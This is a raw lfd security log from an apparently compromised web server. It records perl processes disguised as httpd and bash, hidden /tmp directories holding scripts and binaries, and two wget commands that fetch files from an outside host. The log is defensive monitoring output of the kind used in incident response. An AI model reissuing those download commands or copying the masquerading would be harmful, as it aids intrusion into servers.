Mar 29 15:06:02 server lfd[7456]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1067327 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 15:10:44 server lfd[7006]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:399169 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 15:10:57 server lfd[14928]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 15:11:00 server lfd[14928]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:15:57 server lfd[21318]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 15:15:58 server lfd[21318]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:20:58 server lfd[29495]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:21:01 server lfd[29495]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:21:06 server lfd[29495]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:23:04 server lfd[13434]: *Suspicious Process* PID:3020 PPID:2971 User:nobody Uptime:77 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/ybd.txt
Mar 29 15:25:58 server lfd[5685]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 15:26:01 server lfd[5685]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 15:26:02 server lfd[5685]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:08:14 server lfd[6133]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1071053 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 16:11:03 server lfd[29045]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 16:11:04 server lfd[29045]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:13:14 server lfd[5821]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:402895 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 16:16:03 server lfd[779]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 16:16:05 server lfd[779]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:21:05 server lfd[6774]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:06 server lfd[11881]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:08 server lfd[11881]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:09 server lfd[11881]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 16:26:11 server lfd[11881]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:26:13 server lfd[11881]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 16:47:10 server lfd[32526]: *Suspicious Process* PID:11875 PPID:8957 User:cavvesc Uptime:1265 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 17:11:13 server lfd[8006]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 17:11:14 server lfd[8006]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:11:21 server lfd[8008]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1074847 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 17:16:12 server lfd[10017]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 17:16:13 server lfd[10017]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:16:54 server lfd[10018]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:406742 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 17:21:13 server lfd[11703]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:14 server lfd[12805]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:16 server lfd[12805]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:26:17 server lfd[12805]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 17:31:14 server lfd[13901]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 17:31:16 server lfd[13901]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:11:18 server lfd[19360]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 18:11:21 server lfd[19360]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:14:32 server lfd[6129]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1078632 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 18:16:17 server lfd[18593]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 18:20:20 server lfd[5298]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:410527 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 18:21:19 server lfd[20341]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:21:26 server lfd[20341]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:26:18 server lfd[20651]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:26:21 server lfd[20651]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:31:19 server lfd[18255]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 18:31:21 server lfd[18255]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 18:31:23 server lfd[18255]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:11:21 server lfd[6675]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 19:16:22 server lfd[4031]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:16:23 server lfd[4031]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 19:17:28 server lfd[10661]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1082413 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 19:23:46 server lfd[7364]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:414313 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 19:26:26 server lfd[29839]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:26:27 server lfd[29839]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:26:29 server lfd[29839]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:28 server lfd[29382]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:31 server lfd[29382]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 19:31:34 server lfd[29382]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 19:31:39 server lfd[29382]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:00:43 server lfd[7920]: *Suspicious Process* PID:1135 PPID:1000 User:nobody Uptime:67 secs EXE:/usr/bin/wget CMD:wget http://remarcable.net/images/a/xcl.txt
Mar 29 20:01:36 server lfd[7920]: *Suspicious Process* PID:8715 PPID:8957 User:bppromo Uptime:1633 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 29 20:11:36 server lfd[7364]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 20:16:36 server lfd[2242]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:16:38 server lfd[2242]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 20:17:48 server lfd[9313]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1086028 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 20:26:37 server lfd[25272]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:26:40 server lfd[25272]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:26:41 server lfd[25272]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:30:54 server lfd[11395]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:418351 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 20:31:38 server lfd[21147]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:31:44 server lfd[21147]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 20:36:39 server lfd[16865]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 20:36:42 server lfd[16865]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:11:40 server lfd[12780]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 21:16:42 server lfd[7653]: *Suspicious File* /tmp/.ppma/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:16:49 server lfd[7653]: *Suspicious File* /tmp/.ppma/vuln [nobody:nobody (99:99)] - Linux Binary
Mar 29 21:19:56 server lfd[23887]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1089761 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 21:26:42 server lfd[27576]: *Suspicious File* /tmp/.ppma/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:26:45 server lfd[27576]: *Suspicious File* /tmp/.ppma/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:31:43 server lfd[22222]: *Suspicious File* /tmp/smtx/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:43 server lfd[16209]: *Suspicious File* /tmp/smtx/try [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:51 server lfd[16209]: *Suspicious File* /tmp/smtx/wn.php [nobody:nobody (99:99)] - Script, file extension
Mar 29 21:36:54 server lfd[16209]: *Suspicious File* /tmp/smtx/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 21:36:57 server lfd[11939]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:422324 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 21:41:44 server lfd[9425]: *Suspicious File* /tmp/smtx/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:11:48 server lfd[771]: *Suspicious File* /tmp/.ppma [nobody:nobody (99:99)] - Suspicious directory
Mar 29 22:21:49 server lfd[29344]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 29 22:22:29 server lfd[29344]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:22:32 server lfd[29344]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 29 22:22:33 server lfd[29344]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:22:35 server lfd[29344]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 22:25:17 server lfd[19979]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:254 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 29 22:27:12 server lfd[18902]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1093787 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 22:39:30 server lfd[24029]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:426113 secs EXE:/usr/bin/perl CMD:[bash]
Mar 29 23:27:01 server lfd[23252]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 29 23:27:07 server lfd[23252]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:11 server lfd[23252]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 29 23:27:14 server lfd[23252]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:16 server lfd[23252]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 29 23:27:43 server lfd[13808]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:3987 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 29 23:30:18 server lfd[23148]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1097581 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 29 23:43:51 server lfd[26897]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:429957 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 00:01:34 server lfd[11003]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1099451 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 00:03:35 server lfd[11003]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:431051 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 00:03:50 server lfd[11003]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:6101 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 00:06:14 server lfd[29383]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 00:06:20 server lfd[29383]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 00:06:23 server lfd[29383]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 00:06:25 server lfd[29383]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 00:06:27 server lfd[29383]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:04:36 server lfd[20848]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1103242 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 01:05:26 server lfd[20848]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:434842 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 01:05:37 server lfd[20848]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:9892 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 01:06:25 server lfd[8283]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 01:11:25 server lfd[20933]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:11:29 server lfd[20933]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 01:11:33 server lfd[20933]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 01:11:42 server lfd[20933]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:06:00 server lfd[14316]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1106916 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 02:06:32 server lfd[23998]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 02:07:02 server lfd[14316]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:438517 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 02:07:37 server lfd[14316]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:13567 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 02:11:35 server lfd[1918]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:11:38 server lfd[1918]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 02:16:35 server lfd[20493]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 02:16:40 server lfd[20493]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:06:43 server lfd[28759]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 03:09:20 server lfd[23374]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1110719 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 03:09:48 server lfd[23374]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:442320 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 03:09:56 server lfd[23374]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:17370 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 03:11:42 server lfd[17908]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:16:45 server lfd[32252]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 03:16:46 server lfd[32252]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:16:48 server lfd[32252]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 03:51:27 server lfd[20793]: *Suspicious Process* PID:758 PPID:8957 User:bppromo Uptime:1460 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 04:07:00 server lfd[13465]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 04:10:31 server lfd[15781]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1114391 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 04:11:37 server lfd[15781]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:445991 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 04:11:52 server lfd[15781]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:21041 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 04:12:01 server lfd[31260]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 04:17:02 server lfd[1716]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 04:17:05 server lfd[1716]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 04:17:08 server lfd[1716]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:07:09 server lfd[10579]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 05:11:50 server lfd[20420]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1118059 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 05:12:09 server lfd[24132]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:16:10 server lfd[12535]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:449842 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 05:16:37 server lfd[12535]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:24892 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 05:17:09 server lfd[8241]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 05:17:10 server lfd[8241]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 05:22:09 server lfd[24427]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:07:15 server lfd[10804]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 06:12:15 server lfd[30237]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:14:42 server lfd[24864]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1121845 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 06:17:16 server lfd[22551]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 06:17:16 server lfd[22551]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:18:08 server lfd[15187]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:453566 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 06:22:17 server lfd[11385]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 06:23:50 server lfd[1430]: *Suspicious Process* PID:12884 PPID:11814 User:nobody Uptime:28919 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 06:59:39 server lfd[23251]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:272 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 07:12:24 server lfd[32248]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 07:12:36 server lfd[32248]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 07:14:55 server lfd[20826]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1125457 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 07:17:24 server lfd[17717]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 07:17:26 server lfd[17717]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 07:22:22 server lfd[15724]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:457418 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 07:27:25 server lfd[17695]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:03:31 server lfd[24080]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:4121 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 08:17:07 server lfd[20527]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1129187 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 08:17:37 server lfd[25489]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 08:17:44 server lfd[25489]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:17:51 server lfd[25489]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 08:17:53 server lfd[25489]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 08:23:59 server lfd[19393]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:461156 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 08:27:39 server lfd[1171]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:05:04 server lfd[17040]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:7793 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 09:17:46 server lfd[6000]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 09:19:15 server lfd[18669]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1132916 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 09:22:46 server lfd[19698]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:22:49 server lfd[19698]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 09:22:52 server lfd[19698]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 09:26:52 server lfd[24269]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:464946 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 09:27:46 server lfd[11418]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:11:54 server lfd[15227]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:11767 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 10:17:55 server lfd[28922]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 10:20:29 server lfd[21784]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1136593 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 10:23:01 server lfd[20125]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:23:04 server lfd[20125]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 10:23:06 server lfd[20125]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:27:54 server lfd[25007]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:468611 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 10:28:02 server lfd[31969]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 10:53:27 server lfd[6628]: *Suspicious Process* PID:27122 PPID:8957 User:cavvesc Uptime:601 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:54:27 server lfd[16175]: *Suspicious Process* PID:8762 PPID:8957 User:bppromo Uptime:228 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:58:28 server lfd[4458]: *Suspicious Process* PID:1887 PPID:8957 User:bppromo Uptime:1056 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 10:59:28 server lfd[9971]: *Suspicious Process* PID:3403 PPID:3149 User:cavvesc Uptime:71 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/cavvesc/tmp/webalizer/dns_cache.db -R 250 -p -n cavves.com.br -o /home/cavvesc/tmp/webalizer /usr/local/apache/domlogs/cavves.com.br.bkup
Mar 30 11:02:30 server lfd[25782]: *Suspicious Process* PID:16539 PPID:8957 User:bppromo Uptime:107 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:04:30 server lfd[3778]: *Suspicious Process* PID:23056 PPID:8957 User:cavvesc Uptime:1277 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:07:30 server lfd[19217]: *Suspicious Process* PID:8919 PPID:7653 User:bppromo Uptime:119 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/dns_cache.db -R 250 -p -n boaspromocoes.com.br -o /home/bppromo/tmp/webalizer /usr/local/apache/domlogs/boaspromocoes.com.br.bkup
Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21803 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
